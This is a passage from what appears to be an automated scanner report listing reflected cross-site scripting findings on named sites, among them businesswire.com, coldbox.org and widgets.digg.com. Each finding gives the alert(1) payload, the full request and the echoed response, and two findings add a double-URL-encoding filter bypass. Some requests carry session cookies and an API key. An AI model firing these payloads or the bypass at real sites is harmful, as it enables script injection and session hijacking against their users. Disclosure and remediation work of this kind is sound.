Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Wed, 31 Aug 2011 21:49:11 GMT
Server: Apache/2.2.15 (Fedora) mod_ssl/2.2.15 OpenSSL/1.0.0b-fips PHP/5.3.3
X-Powered-By: PHP/5.3.3
Expires: Thu, 01 Sep 2011 21:49:11 GMT
Last-Modified: Wed, 08 Jun 2011 16:07:00 GMT
Vary: Accept-Encoding
Content-Length: 479
Connection: close
Content-Type: text/html; charset=UTF-8

<!--
document.write( '<div id="TwitterCounter"><a href="http://twittercounter.com/ChromeBrowser?utm_source=referring%2Bsites&utm_medium=organic%2Blinks&utm_campaign=twittercounter%2Bbutton" title=
...[SNIP]...
<img src="http://button.twittercounter.com/static/?username=ChromeBrowser&style=bird3a419';alert(1)//503c7e8495b" width="88" height="26" style="border:none;" alt="Twitter Counter for @ChromeBrowser" />
...[SNIP]...

4.149. http://twittercounter.com/embed/ [username parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://twittercounter.com
Path:	/embed/

Issue detail

The value of the username request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 88805'%3balert(1)//5fec4026358 was submitted in the username parameter. This input was echoed as 88805';alert(1)//5fec4026358 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /embed/?username=ChromeBrowser88805'%3balert(1)//5fec4026358&style=bird HTTP/1.1
Host: twittercounter.com
Proxy-Connection: keep-alive
Referer: http://google-chrome-browser.com/tags/extensions
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.218 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Wed, 31 Aug 2011 21:49:11 GMT
Server: Apache/2.2.15 (Fedora) mod_ssl/2.2.15 OpenSSL/1.0.0b-fips PHP/5.3.3
X-Powered-By: PHP/5.3.3
Expires: Thu, 01 Sep 2011 21:49:11 GMT
Last-Modified: Wed, 08 Jun 2011 16:07:00 GMT
Vary: Accept-Encoding
Content-Length: 551
Connection: close
Content-Type: text/html; charset=UTF-8

<!--
document.write( '<div id="TwitterCounter"><a href="http://twittercounter.com/ChromeBrowser88805';alert(1)//5fec4026358?utm_source=referring%2Bsites&utm_medium=organic%2Blinks&utm_campaign=twittercounter%2Bbird%2Bbutton" title="Twitter Counter for @ChromeBrowser88805';alert(1)//5fec4026358" target="_blank">
...[SNIP]...

4.150. http://widgets.active.com/widgets/nearyou/search [cb parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://widgets.active.com
Path:	/widgets/nearyou/search

Issue detail

The value of the cb request parameter is copied into the HTML document as plain text between tags. The payload e20d7<script>alert(1)</script>36250b8f91c was submitted in the cb parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /widgets/nearyou/search?api_key=45ts42zbd3tjfp25g722juwz&s=date_asc&f=activities&v=json&m=meta%3AstartDate%3Adaterange%3Atoday..&l=&num=3&cb=OX.AJAST.__callbacks__.callback1e20d7<script>alert(1)</script>36250b8f91c HTTP/1.1
Host: widgets.active.com
Proxy-Connection: keep-alive
Referer: http://www.activenetwork.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.218 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Accept-Ranges: bytes
Cache-Control: public, max-age=7200
Content-Language: en-US
Content-Type: text;charset=ISO-8859-1
Date: Wed, 31 Aug 2011 17:58:29 GMT
Expires: Wed, 31 Aug 2011 19:58:28 GMT
Server: nginx/0.7.62
X-Mashery-Responder: proxyworker-i-4075c629.mashery.com
X-Powered-By: Servlet 2.4; JBoss-4.0.4.GA (build: CVSTag=JBoss_4_0_4_GA date=200605151000)/Tomcat-5.5
Content-Length: 8386
Connection: keep-alive

OX.AJAST.__callbacks__.callback1e20d7<script>alert(1)</script>36250b8f91c({"endIndex":3,"numberOfResults":8170,"pageSize":3,"searchTime":0.407272,"_results":[{"escapedUrl":"http://www.active.com/10k-race/ellicott-city-md/8th-annual-knights-of-columbus-10k-run-fun-walk-and-k
...[SNIP]...

4.151. http://widgets.digg.com/buttons/count [url parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://widgets.digg.com
Path:	/buttons/count

Issue detail

The value of the url request parameter is copied into the HTML document as plain text between tags. The payload 4ea29<script>alert(1)</script>30dae4c7855 was submitted in the url parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /buttons/count?url=file%3A///D%3A/acunetix_reports/reports/mvtimescom/blind-sql-injection-xss-cwe79-capec66-poc.html4ea29<script>alert(1)</script>30dae4c7855 HTTP/1.1
Host: widgets.digg.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.112 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Age: 0
Date: Fri, 12 Aug 2011 00:54:54 GMT
Via: NS-CACHE: 100
ETag: "KXKDMGAKPNNYMRTSZV"
Content-Length: 178
Content-Type: application/json
Server: TornadoServer/0.1
Accept-Ranges: bytes
Cache-Control: private, max-age=599
Expires: Fri, 12 Aug 2011 01:04:53 GMT
X-CDN: Cotendo
Connection: Keep-Alive

__DBW.collectDiggs({"url": "file:///D:/acunetix_reports/reports/mvtimescom/blind-sql-injection-xss-cwe79-capec66-poc.html4ea29<script>alert(1)</script>30dae4c7855", "diggs": 0});

4.152. http://www.businesswire.com/news/home/20110606006390/en/eBay-Agrees-Acquire-Magento [REST URL parameter 3] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.businesswire.com
Path:	/news/home/20110606006390/en/eBay-Agrees-Acquire-Magento

Issue detail

The value of REST URL parameter 3 is copied into the HTML document as plain text between tags. The payload 10500%253cscript%253ealert%25281%2529%253c%252fscript%253ec09c9ece34b was submitted in the REST URL parameter 3. This input was echoed as 10500<script>alert(1)</script>c09c9ece34b in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Remediation detail

There is probably no need to perform a second URL-decode of the value of REST URL parameter 3 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /news/home/2011060600639010500%253cscript%253ealert%25281%2529%253c%252fscript%253ec09c9ece34b/en/eBay-Agrees-Acquire-Magento HTTP/1.1
Accept: text/html, application/xhtml+xml, */*
Accept-Language: en-US
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/5.0)
Accept-Encoding: gzip, deflate
Proxy-Connection: Keep-Alive
Host: www.businesswire.com

Response

HTTP/1.1 200 OK
Date: Fri, 12 Aug 2011 13:41:29 GMT
Server: Apache
Vary: Host
Cache-Control: no-cache
X-Powered-By: Servlet/2.5 JSP/2.1
Content-Type: text/html; charset=UTF-8
Connection: close
Content-Length: 21474

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>News | Business
...[SNIP]...
<span class="epi-error">Cannot find news for id = 2011060600639010500<script>alert(1)</script>c09c9ece34b and language = en.</span>
...[SNIP]...

4.153. http://www.businesswire.com/news/home/20110606006390/en/eBay-Agrees-Acquire-Magento [REST URL parameter 4] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.businesswire.com
Path:	/news/home/20110606006390/en/eBay-Agrees-Acquire-Magento

Issue detail

The value of REST URL parameter 4 is copied into the HTML document as plain text between tags. The payload 11e6f%253cscript%253ealert%25281%2529%253c%252fscript%253e7f5cefa0606 was submitted in the REST URL parameter 4. This input was echoed as 11e6f<script>alert(1)</script>7f5cefa0606 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Remediation detail

There is probably no need to perform a second URL-decode of the value of REST URL parameter 4 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /news/home/20110606006390/en11e6f%253cscript%253ealert%25281%2529%253c%252fscript%253e7f5cefa0606/eBay-Agrees-Acquire-Magento HTTP/1.1
Accept: text/html, application/xhtml+xml, */*
Accept-Language: en-US
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/5.0)
Accept-Encoding: gzip, deflate
Proxy-Connection: Keep-Alive
Host: www.businesswire.com

Response

HTTP/1.1 200 OK
Date: Fri, 12 Aug 2011 13:41:31 GMT
Server: Apache
Vary: Host
Cache-Control: no-cache
X-Powered-By: Servlet/2.5 JSP/2.1
Content-Type: text/html; charset=UTF-8
Content-Length: 21474

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>News | Business
...[SNIP]...
<span class="epi-error">Cannot find news for id = 20110606006390 and language = en11e6f<script>alert(1)</script>7f5cefa0606.</span>
...[SNIP]...

4.154. http://www.coldbox.org/about [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.coldbox.org
Path:	/about

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload bf66a"><script>alert(1)</script>9a2ce7b8351 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /aboutbf66a"><script>alert(1)</script>9a2ce7b8351 HTTP/1.1
Host: www.coldbox.org
Proxy-Connection: keep-alive
Referer: http://www.coldbox.org/download/extras
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.218 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmc=4587041; __utmz=4587041.1314798131.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); CFID=463910; CFTOKEN=926badce727ab15b-40BB2514-F55F-48F3-D505182831D1ACFA; JSESSIONID=8430951b628c8dab2c372966775321c47463; __utma=4587041.1536497295.1314798131.1314798131.1314798131.1; __utmb=4587041

Response

HTTP/1.1 404 Page Not Found
Date: Wed, 31 Aug 2011 13:43:23 GMT
Server: Apache
Content-Type: text/html; charset=UTF-8
Content-Length: 10724

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>

<meta http
...[SNIP]...
<input type="hidden" name="refRoute" value="http://www.coldbox.org//aboutbf66a"><script>alert(1)</script>9a2ce7b8351" />
...[SNIP]...

4.155. http://www.coldbox.org/download [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.coldbox.org
Path:	/download

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload fb572"><script>alert(1)</script>08b1fa9153e was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /downloadfb572"><script>alert(1)</script>08b1fa9153e HTTP/1.1
Host: www.coldbox.org
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://blog.coldbox.org/post.cfm/wirebox-orm-entity-injection-howto

Response

HTTP/1.1 404 Page Not Found
Date: Wed, 31 Aug 2011 13:39:45 GMT
Server: Apache
Content-Type: text/html; charset=UTF-8
Content-Length: 10727

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>

<meta http
...[SNIP]...
<input type="hidden" name="refRoute" value="http://www.coldbox.org//downloadfb572"><script>alert(1)</script>08b1fa9153e" />
...[SNIP]...

4.156. http://www.coldbox.org/download/extras [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.coldbox.org
Path:	/download/extras

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload f2959"><script>alert(1)</script>184bc2a0b96 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /downloadf2959"><script>alert(1)</script>184bc2a0b96/extras HTTP/1.1
Host: www.coldbox.org
Proxy-Connection: keep-alive
Referer: http://www.coldbox.org/download
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.218 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmc=4587041; __utmz=4587041.1314798131.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); CFID=463910; CFTOKEN=926badce727ab15b-40BB2514-F55F-48F3-D505182831D1ACFA; JSESSIONID=8430951b628c8dab2c372966775321c47463; __utma=4587041.1536497295.1314798131.1314798131.1314798131.1; __utmb=4587041

Response

HTTP/1.1 404 Page Not Found
Date: Wed, 31 Aug 2011 13:42:32 GMT
Server: Apache
Content-Type: text/html; charset=UTF-8
Content-Length: 10734

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>

<meta http
...[SNIP]...
<input type="hidden" name="refRoute" value="http://www.coldbox.org//downloadf2959"><script>alert(1)</script>184bc2a0b96/extras" />
...[SNIP]...

4.157. http://www.coldbox.org/download/extras [REST URL parameter 2] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.coldbox.org
Path:	/download/extras

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 59cd2"><script>alert(1)</script>357a26e6101 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /download/extras59cd2"><script>alert(1)</script>357a26e6101 HTTP/1.1
Host: www.coldbox.org
Proxy-Connection: keep-alive
Referer: http://www.coldbox.org/download
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.218 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmc=4587041; __utmz=4587041.1314798131.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); CFID=463910; CFTOKEN=926badce727ab15b-40BB2514-F55F-48F3-D505182831D1ACFA; JSESSIONID=8430951b628c8dab2c372966775321c47463; __utma=4587041.1536497295.1314798131.1314798131.1314798131.1; __utmb=4587041

Response

HTTP/1.1 404 Page Not Found
Date: Wed, 31 Aug 2011 13:42:33 GMT
Server: Apache
Content-Type: text/html; charset=UTF-8
Content-Length: 10734

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>

<meta http
...[SNIP]...
<input type="hidden" name="refRoute" value="http://www.coldbox.org//download/extras59cd2"><script>alert(1)</script>357a26e6101" />
...[SNIP]...

4.158. http://www.coldbox.org/downloads/searchplugin/coldboxsearch.xml [REST URL parameter 3] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.coldbox.org
Path:	/downloads/searchplugin/coldboxsearch.xml

Issue detail

The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 4f07e"><script>alert(1)</script>a24f35fe815 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /downloads/searchplugin/coldboxsearch.xml4f07e"><script>alert(1)</script>a24f35fe815 HTTP/1.1
Host: www.coldbox.org
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.218 Safari/535.1
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmc=4587041; __utmz=4587041.1314798131.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); CFID=463910; CFTOKEN=926badce727ab15b-40BB2514-F55F-48F3-D505182831D1ACFA; JSESSIONID=8430951b628c8dab2c372966775321c47463; __utmb=4587041; __utma=4587041.1536497295.1314798131.1314798131.1314798131.1

Response

HTTP/1.1 404 Page Not Found
Date: Wed, 31 Aug 2011 13:42:07 GMT
Server: Apache
Content-Type: text/html; charset=UTF-8
Content-Length: 10759

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>

<meta http
...[SNIP]...
<input type="hidden" name="refRoute" value="http://www.coldbox.org//downloads/searchplugin/coldboxsearch/xml4f07e"><script>alert(1)</script>a24f35fe815" />
...[SNIP]...

4.159. http://www.coldbox.org/favicon.ico [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.coldbox.org
Path:	/favicon.ico

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload cf15d"><script>alert(1)</script>a490852715 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /favicon.icocf15d"><script>alert(1)</script>a490852715 HTTP/1.1
Host: www.coldbox.org
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Cookie: CFID=463899; CFTOKEN=805d3cb80880268d-40AAC9F0-ECD4-A078-0359E4E79D6E76A2; JSESSIONID=8430a7eeab6c43dbb6bd22f25767c1d36723

Response

HTTP/1.1 404 Page Not Found
Date: Wed, 31 Aug 2011 13:40:00 GMT
Server: Apache
Content-Type: text/html; charset=UTF-8
Content-Length: 10729

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>

<meta http
...[SNIP]...
<input type="hidden" name="refRoute" value="http://www.coldbox.org//favicon/icocf15d"><script>alert(1)</script>a490852715" />
...[SNIP]...

4.160. http://www.coldbox.org/includes/images/ColdfusionBuilder.jpg [REST URL parameter 3] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.coldbox.org
Path:	/includes/images/ColdfusionBuilder.jpg

Issue detail

The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 4ffbf"><script>alert(1)</script>e2e86c712bc was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /includes/images/ColdfusionBuilder.jpg4ffbf"><script>alert(1)</script>e2e86c712bc HTTP/1.1
Host: www.coldbox.org
Proxy-Connection: keep-alive
Referer: http://www.coldbox.org/download/extras
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.218 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmc=4587041; __utmz=4587041.1314798131.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); CFID=463910; CFTOKEN=926badce727ab15b-40BB2514-F55F-48F3-D505182831D1ACFA; JSESSIONID=8430951b628c8dab2c372966775321c47463; __utma=4587041.1536497295.1314798131.1314798131.1314798131.1; __utmb=4587041

Response

HTTP/1.1 404 Page Not Found
Date: Wed, 31 Aug 2011 13:43:08 GMT
Server: Apache
Content-Type: text/html; charset=UTF-8
Content-Length: 10756

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>

<meta http
...[SNIP]...
<input type="hidden" name="refRoute" value="http://www.coldbox.org//includes/images/ColdfusionBuilder/jpg4ffbf"><script>alert(1)</script>e2e86c712bc" />
...[SNIP]...

4.161. http://www.coldbox.org/includes/images/MessageBox.png [REST URL parameter 3] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.coldbox.org
Path:	/includes/images/MessageBox.png

Issue detail

The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 69c2c"><script>alert(1)</script>47e1d5ce7c6 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /includes/images/MessageBox.png69c2c"><script>alert(1)</script>47e1d5ce7c6 HTTP/1.1
Host: www.coldbox.org
Proxy-Connection: keep-alive
Referer: http://www.coldbox.org/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.218 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utma=4587041.1536497295.1314798131.1314798131.1314798131.1; __utmb=4587041; __utmc=4587041; __utmz=4587041.1314798131.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); CFID=463910; CFTOKEN=926badce727ab15b-40BB2514-F55F-48F3-D505182831D1ACFA; JSESSIONID=8430951b628c8dab2c372966775321c47463

Response

HTTP/1.1 404 Page Not Found
Date: Wed, 31 Aug 2011 13:42:03 GMT
Server: Apache
Content-Type: text/html; charset=UTF-8
Content-Length: 10749

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>

<meta http
...[SNIP]...
<input type="hidden" name="refRoute" value="http://www.coldbox.org//includes/images/MessageBox/png69c2c"><script>alert(1)</script>47e1d5ce7c6" />
...[SNIP]...

4.162. http://www.coldbox.org/includes/infobox.css [REST URL parameter 2] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.coldbox.org
Path:	/includes/infobox.css

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 89374"><script>alert(1)</script>b30520cf7d5 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /includes/infobox.css89374"><script>alert(1)</script>b30520cf7d5 HTTP/1.1
Host: www.coldbox.org
Proxy-Connection: keep-alive
Referer: http://www.coldbox.org/index.cfm/support/alliance
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.218 Safari/535.1
Accept: text/css,*/*;q=0.1
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmc=4587041; __utmz=4587041.1314798131.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); CFID=463910; CFTOKEN=926badce727ab15b-40BB2514-F55F-48F3-D505182831D1ACFA; JSESSIONID=8430951b628c8dab2c372966775321c47463; __utma=4587041.1536497295.1314798131.1314798131.1314798131.1; __utmb=4587041

Response

HTTP/1.1 404 Page Not Found
Date: Wed, 31 Aug 2011 13:58:09 GMT
Server: Apache
Content-Type: text/html; charset=UTF-8
Content-Length: 10739

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>

<meta http
...[SNIP]...
<input type="hidden" name="refRoute" value="http://www.coldbox.org//includes/infobox/css89374"><script>alert(1)</script>b30520cf7d5" />
...[SNIP]...

4.163. http://www.coldbox.org/includes/site.css [REST URL parameter 2] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.coldbox.org
Path:	/includes/site.css

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 86549"><script>alert(1)</script>6e0e87e939f was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /includes/site.css86549"><script>alert(1)</script>6e0e87e939f HTTP/1.1
Host: www.coldbox.org
Proxy-Connection: keep-alive
Referer: http://www.coldbox.org/index.cfm/support/alliance
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.218 Safari/535.1
Accept: text/css,*/*;q=0.1
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmc=4587041; __utmz=4587041.1314798131.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); CFID=463910; CFTOKEN=926badce727ab15b-40BB2514-F55F-48F3-D505182831D1ACFA; JSESSIONID=8430951b628c8dab2c372966775321c47463; __utma=4587041.1536497295.1314798131.1314798131.1314798131.1; __utmb=4587041

Response

HTTP/1.1 404 Page Not Found
Date: Wed, 31 Aug 2011 13:58:10 GMT
Server: Apache
Content-Type: text/html; charset=UTF-8
Content-Length: 10736

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>

<meta http
...[SNIP]...
<input type="hidden" name="refRoute" value="http://www.coldbox.org//includes/site/css86549"><script>alert(1)</script>6e0e87e939f" />
...[SNIP]...

4.164. http://www.coldbox.org/index.cfm/support/alliance [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.coldbox.org
Path:	/index.cfm/support/alliance

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 6ad53"><script>alert(1)</script>72c02369ab2 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /index.cfm6ad53"><script>alert(1)</script>72c02369ab2/support/alliance HTTP/1.1
Host: www.coldbox.org
Proxy-Connection: keep-alive
Referer: http://www.compknowhow.com/
